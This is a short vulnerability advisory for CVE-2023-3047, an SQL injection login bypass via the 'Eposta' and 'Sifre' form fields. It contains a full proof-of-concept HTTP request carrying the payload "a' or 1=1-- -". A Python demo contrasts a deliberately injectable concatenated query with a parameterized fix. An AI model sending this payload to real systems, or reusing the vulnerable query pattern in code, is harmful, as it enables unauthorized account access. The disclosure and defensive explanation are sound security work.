Author: Efe Özel
Team: Ömer Yılmaz – Murat Öztürk
CVE-ID: CVE-2023-3047
Vuln Details: SQL Injection
Parameters: Eposta & Sifre
Details: The SQL database can be retrieved via the “Eposta” (email) and “Sifre” parameters. The login page can also be bypassed with the SQL payload shown in the request below.
HTTP REQUEST
POST /Login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------404457056926379632621424549315
Content-Length: 312
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Login/
Upgrade-Insecure-Requests: 1

-----------------------------404457056926379632621424549315
Content-Disposition: form-data; name="Eposta"

a' or 1=1-- -
-----------------------------404457056926379632621424549315
Content-Disposition: form-data; name="Sifre"

a' or 1=1-- -
-----------------------------404457056926379632621424549315--
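
Why the value in the request above bypasses a login check, and how bound parameters stop it, shown as an added example that is not the affected product's code. The SQLite table, its single row and the function names are assumptions made for illustration; the page does not show the backend query.

```python
import sqlite3

# Value the request above sends in both Eposta and Sifre.
PAYLOAD = "a' or 1=1-- -"


def make_db():
    # Constructed table and row (assumptions; the page does not show the schema).
    # Plaintext password only to keep the demo short; store a salted hash in practice.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (eposta TEXT, sifre TEXT)")
    db.execute("INSERT INTO users VALUES ('admin@example.test', 'S3cret!')")
    return db


def vulnerable_sql(eposta, sifre):
    # Hypothetical flawed handler: request values are pasted into the SQL text.
    return ("SELECT eposta FROM users WHERE eposta = '" + eposta +
            "' AND sifre = '" + sifre + "'")


def login_vulnerable(db, eposta, sifre):
    return db.execute(vulnerable_sql(eposta, sifre)).fetchone() is not None


def login_parameterized(db, eposta, sifre):
    # Bound parameters: the driver passes the values as data, never as SQL syntax.
    sql = "SELECT eposta FROM users WHERE eposta = ? AND sifre = ?"
    return db.execute(sql, (eposta, sifre)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # The quote closes the string literal and "-- -" comments out the rest,
    # leaving WHERE eposta = 'a' or 1=1, which is true for every row.
    print(vulnerable_sql(PAYLOAD, PAYLOAD))
    print("vulnerable, payload:   ", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized, payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("parameterized, valid:  ",
          login_parameterized(db, "admin@example.test", "S3cret!"))
```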